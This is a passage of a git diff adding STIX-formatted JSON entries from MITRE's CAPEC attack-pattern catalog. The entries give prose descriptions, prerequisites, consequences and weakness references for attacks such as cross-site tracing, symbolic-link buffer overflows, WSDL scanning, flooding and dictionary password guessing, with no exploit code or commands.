"http://en.wikipedia.org/wiki/Debugger", + "external_id": "REF-52" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/Disassembler", + "external_id": "REF-53" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "Access to a binary or executable such that it can be analyzed by various utilities." + ], + "x_capec_resources_required": [ + "Binary analysis programs such as 'strings' or 'grep', or hex editors." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a.json b/capec/attack-pattern/attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a.json new file mode 100644 index 0000000000..6a71858912 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a.json @@ -0,0 +1,106 @@ +{ + "type": "bundle", + "id": "bundle--2760435d-4de8-4727-9ea3-88d1221b774a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Buffer Overflow via Symbolic Links", + "description": "This type of attack leverages the use of symbolic links to cause buffer overflows. An attacker can try to create or manipulate a symbolic link file such that its contents result in out of bounds data. When the target software processes the symbolic link file, it could potentially overflow internal buffers with insufficient bounds checking.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/45.html", + "external_id": "CAPEC-45" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html", + "external_id": "CWE-120" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html", + "external_id": "CWE-302" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html", + "external_id": "CWE-118" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html", + "external_id": "CWE-119" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html", + "external_id": "CWE-680" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n Attack Example: Overflow with Symbolic Links in EFTP Server\n The EFTP server has a buffer overflow that can be exploited if an attacker uploads a .lnk (link) file that contains more than 1,744 bytes. This is a classic example of an indirect buffer overflow. First the attacker uploads some content (the link file) and then the attacker causes the client consuming the data to be exploited. In this example, the ls command is exploited to compromise the server software.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker can create symbolic link on the target host.", + "The target host does not perform correct boundary checking while consuming data from a resources." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70.json b/capec/attack-pattern/attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70.json new file mode 100644 index 0000000000..1ebf3198ac --- /dev/null +++ b/capec/attack-pattern/attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70.json @@ -0,0 +1,108 @@ +{ + "type": "bundle", + "id": "bundle--0bf27516-4e6a-490e-b131-730ff173670c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "Exploitation of Trusted Credentials", + "description": "Attacks on session IDs and resource IDs take advantage of the fact that some software accepts user input without verifying its authenticity. For example, a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or indeed the process that wrote the message to the queue are authentic and authorized to do so. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. In a similar way servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Session IDs may be guessed due to insufficient randomness, poor protection (passed in the clear), lack of integrity (unsigned), or improperly correlation with access control policy enforcement points. Exposed configuration and properties files that contain system passwords, database connection strings, and such may also give an attacker an edge to identify these identifiers. The net result is that spoofing and impersonation is possible leading to an attacker's ability to break authentication, authorization, and audit controls on the system.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/21.html", + "external_id": "CAPEC-21" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html", + "external_id": "CWE-290" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html", + "external_id": "CWE-302" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html", + "external_id": "CWE-346" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html", + "external_id": "CWE-539" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/6.html", + "external_id": "CWE-6" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html", + "external_id": "CWE-384" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html", + "external_id": "CWE-664" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html", + "external_id": "CWE-602" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/642.html", + "external_id": "CWE-642" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an attacker to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an attacker to exploit session IDs.\n A brute force attack involves an attacker repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an attacker can retry several hundred or thousand request with little to no issue on their side.\n The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The attacker can then use these variables and access the application.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Server software must rely on weak session IDs proof and/or verification schemes" + ], + "x_capec_resources_required": [ + "Ability to deploy software on network. Ability to communicate synchronously or asynchronously with server" + ], + "x_capec_skills_required": { + "Low": "To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--0500cb36-fc64-4b99-be3d-156b7867d014.json b/capec/attack-pattern/attack-pattern--0500cb36-fc64-4b99-be3d-156b7867d014.json new file mode 100644 index 0000000000..f660b92bc7 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0500cb36-fc64-4b99-be3d-156b7867d014.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--9ffcd5b5-52bf-4ebf-919f-9f109b97c3d9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0500cb36-fc64-4b99-be3d-156b7867d014", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Capture Credentials via Keylogger", + "description": "An adversary deploys a keylogger in an effort to obtain credentials directly from a system's user. After capturing all the keystrokes made by a user, the adversary can analyze the data and determine which string are likely to be passwords or other credential related information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/568.html", + "external_id": "CAPEC-568" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The ability to install the keylogger, either in person or remote." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--058622b3-81cb-403b-9169-404832c7afaf.json b/capec/attack-pattern/attack-pattern--058622b3-81cb-403b-9169-404832c7afaf.json new file mode 100644 index 0000000000..595bcb1cd2 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--058622b3-81cb-403b-9169-404832c7afaf.json @@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--80a5fb47-2aec-426e-937a-ec8245392c9e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--058622b3-81cb-403b-9169-404832c7afaf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Cross Site Tracing", + "description": "Cross Site Tracing (XST) enables an adversary to steal the victim's session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim's browser communicates to destination system's web server. The adversary first gets a malicious script to run in the victim's browser that induces the browser to initiate an HTTP TRACE request to the web server. If the destination web server allows HTTP TRACE requests, it will proceed to return a response to the victim's web browser that contains the original HTTP request in its body. The function of HTTP TRACE, as defined by the HTTP specification, is to echo the request that the web server receives from the client back to the client. Since the HTTP header of the original request had the victim's session cookie in it, that session cookie can now be picked off the HTTP TRACE response and sent to the adversary's malicious site. XST becomes relevant when direct access to the session cookie via the \"document.cookie\" object is disabled with the use of httpOnly attribute which ensures that the cookie can be transmitted in HTTP requests but cannot be accessed in other ways. Using SSL does not protect against XST. If the system with which the victim is interacting is susceptible to XSS, an adversary can exploit that weakness directly to get his or her malicious script to issue an HTTP TRACE request to the destination system's web server. In the absence of an XSS weakness on the site with which the victim is interacting, an adversary can get the script to come from the site that he controls and get it to execute in the victim's browser (if he can trick the victim's into visiting his malicious website or clicking on the link that he supplies). However, in that case, due to the same origin policy protection mechanism in the browser, the adversary's malicious script cannot directly issue an HTTP TRACE request to the destination system's web server because the malicious script did not originate at that domain. An adversary will then need to find a way to exploit another weakness that would enable him or her to get around the same origin policy protection.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/107.html", + "external_id": "CAPEC-107" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/648.html", + "external_id": "CWE-648" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Jeremiah Grossman, Cross-Site Tracing (XST), 2003, WhiteHat Security", + "url": "http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf", + "external_id": "REF-3" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "An adversary determines that a particular system is vulnerable to reflected cross-site scripting (XSS) and endeavors to leverage this weakness to steal the victim's authentication cookie. An adversary realizes that since httpOnly attribute is set on the user's cookie, it is not possible to steal it directly with his malicious script. Instead, the adversary has their script use XMLHTTP ActiveX control in the victim's IE browser to issue an HTTP TRACE to the target system's server which has HTTP TRACE enabled. The original HTTP TRACE request contains the session cookie and so does the echoed response. The adversary picks the session cookie from the body of HTTP TRACE response and ships it to the adversary. The adversary then uses the newly acquired victim's session cookie to impersonate the victim in the target system." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "HTTP TRACE is enabled on the web server", + "The destination system is susceptible to XSS or an adversary can leverage some other weakness to bypass the same origin policy", + "Scripting is enabled in the client's browser", + "HTTP is used as the communication protocol between the server and the client" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Understanding of the HTTP protocol and an ability to craft a malicious script" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--064c9dd0-8008-4ca9-bde6-63feef10d053.json b/capec/attack-pattern/attack-pattern--064c9dd0-8008-4ca9-bde6-63feef10d053.json new file mode 100644 index 0000000000..809d079911 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--064c9dd0-8008-4ca9-bde6-63feef10d053.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--7f3d4eff-2969-478d-a082-4646e0c38edf", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--064c9dd0-8008-4ca9-bde6-63feef10d053", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: DTD Injection in a SOAP Message", + "description": "This pattern has been deprecated as it was determined to be an unnecessary layer of abstraction. Please refer to the pattern CAPEC-228 : DTD Injection going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/254.html", + "external_id": "CAPEC-254" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--06e600b5-fc35-41e3-8f11-cfe801d0e623.json b/capec/attack-pattern/attack-pattern--06e600b5-fc35-41e3-8f11-cfe801d0e623.json new file mode 100644 index 0000000000..780b4048e6 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--06e600b5-fc35-41e3-8f11-cfe801d0e623.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--fa9b3edd-8f2d-48f1-ac6c-27a9fff524fc", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--06e600b5-fc35-41e3-8f11-cfe801d0e623", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "IP 'ID' Echoed Byte-Order Probe", + "description": "This OS fingerprinting probe tests to determine if the remote host echoes back the IP 'ID' value from the probe packet. An attacker sends a UDP datagram with an arbitrary IP 'ID' value to a closed port on the remote host to observe the manner in which this bit is echoed back in the ICMP error message. The identification field (ID) is typically utilized for reassembling a fragmented packet. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within an ICMP error message.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/318.html", + "external_id": "CAPEC-318" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71.json b/capec/attack-pattern/attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71.json new file mode 100644 index 0000000000..059d337dae --- /dev/null +++ b/capec/attack-pattern/attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71.json @@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--1274a858-2dc3-47e4-a68a-2c8862adfab3", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "WSDL Scanning", + "description": "This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/95.html", + "external_id": "CAPEC-95" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/538.html", + "external_id": "CWE-538" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Walid Negm, Anatomy of a Web Services Attack, 2004--03---01, ForumSystems", + "url": "https://www.forumsys.com/wp-content/uploads/2014/01/Anatomy-of-a-Web-Services-Attack.pdf", + "external_id": "REF-554" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Frank Coyle, Seven Steps to XML Mastery, 2006--08---25", + "url": "http://www.informit.com/articles/article.aspx?p=601349", + "external_id": "REF-555" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_example_instances": [ + "A WSDL interface may expose a function vulnerable to SQL Injection.", + "\n The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.\n Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.\n Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.\n Source : \"Seven Steps to XML Mastery, Step 7: Ensure XML Security\", Frank Coyle. See reference section.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A client program connecting to a web service can read the WSDL to determine what functions are available on the server.", + "The target host exposes vulnerable functions within its WSDL interface." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as reading WSDL and starting sending invalid request.", + "Medium": "This attack can be used to perform more sophisticated attacks (SQL injection, etc.)" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--0829aa8e-55a4-46cb-be87-43dbc49d6a5e.json b/capec/attack-pattern/attack-pattern--0829aa8e-55a4-46cb-be87-43dbc49d6a5e.json new file mode 100644 index 0000000000..c2ea022281 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0829aa8e-55a4-46cb-be87-43dbc49d6a5e.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--a60fff86-1196-46f0-b237-5e3af093321f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0829aa8e-55a4-46cb-be87-43dbc49d6a5e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Flooding", + "description": "An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/125.html", + "external_id": "CAPEC-125" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html", + "external_id": "CWE-404" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful flooding attack compromises the availability of the target system's service by exhausting its available resources.)", + "Resource Consumption (A successful flooding attack compromises the availability of the target system's service by exhausting its available resources.)" + ] + }, + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Any target that services requests is vulnerable to this attack on some level of scale." + ], + "x_capec_resources_required": [ + "A script or program capable of generating more requests than the target can handle, or a network or cluster of objects all capable of making simultaneous requests." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--08fc69ee-ec0f-466e-b81f-3e4ad15f957b.json b/capec/attack-pattern/attack-pattern--08fc69ee-ec0f-466e-b81f-3e4ad15f957b.json new file mode 100644 index 0000000000..d5472ed9cb --- /dev/null +++ b/capec/attack-pattern/attack-pattern--08fc69ee-ec0f-466e-b81f-3e4ad15f957b.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--10c7d6e1-2153-4880-8ed2-740832bab0ba", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--08fc69ee-ec0f-466e-b81f-3e4ad15f957b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Fuzzing for garnering other adjacent user/sensitive data", + "description": "An attacker who is authorized to send queries to a target sends variants of expected queries in the hope that these modified queries might return information (directly or indirectly through error logs) beyond what the expected set of queries should provide. Many client applications use specific query templates when interacting with a server and often automatically fill in specific fields or attributes. For example, a client that queries an employee database might have templates such that the user only supplies the target's name and the template dictates the fields to be returned (location, position in the company, phone number, etc.). If the server does not verify that the query matches one of the expected templates, an attacker who is allowed to send normal queries could modify their query to try to return additional information. In the above example, additional information might include social security numbers or salaries. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. In this particular attack, the fuzzing is applied to the format of the expected templates, creating variants that request additional information, exclude limiting clauses, or alter fields that identify the requester in order to subvert access controls. The attacker may not know the names of fields to request or how other modifications will affect the server response, but by attempting multiple plausible variants, they might eventually trigger a server response that divulges sensitive information. Other possible outcomes include server crashes and resource consumption if the unexpected queries cause the server to enter an unstable state or perform excessive computation.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/261.html", + "external_id": "CAPEC-261" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The server must assume that the queries it receives follow specific templates and/or have fields or attributes that follow specific procedures. The server must process queries that it receives without adequately checking or sanitizing queries to ensure they follow these templates." + ], + "x_capec_resources_required": [ + "The attacker must have sufficient privileges to send queries to the targeted server. A normal client might limit the nature of these queries, so the attacker must either have a modified client or their own application which allows them to modify the expected queries." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--0a4d7993-b6a5-4102-8789-1e20cf34f3a9.json b/capec/attack-pattern/attack-pattern--0a4d7993-b6a5-4102-8789-1e20cf34f3a9.json new file mode 100644 index 0000000000..bd2b767e57 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0a4d7993-b6a5-4102-8789-1e20cf34f3a9.json @@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--8004ee5f-6064-4ac7-b4d2-071de2286e5f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0a4d7993-b6a5-4102-8789-1e20cf34f3a9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Dictionary-based Password Attack", + "description": "An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/16.html", + "external_id": "CAPEC-16" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html", + "external_id": "CWE-521" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html", + "external_id": "CWE-262" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html", + "external_id": "CWE-263" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "A system user selects the word \"treacherous\" as their passwords believing that it would be very difficult to guess. The password-based dictionary attack is used to crack this password and gain access to the account.", + "\n The Cisco LEAP challenge/response authentication mechanism uses passwords in a way that is susceptible to dictionary attacks, which makes it easier for remote attackers to gain privileges via brute force password guessing attacks.\n Cisco LEAP is a mutual authentication algorithm that supports dynamic derivation of session keys. With Cisco LEAP, mutual authentication relies on a shared secret, the user's logon password (which is known by the client and the network), and is used to respond to challenges between the user and the Remote Authentication Dial-In User Service (RADIUS) server.\n Methods exist for someone to write a tool to launch an 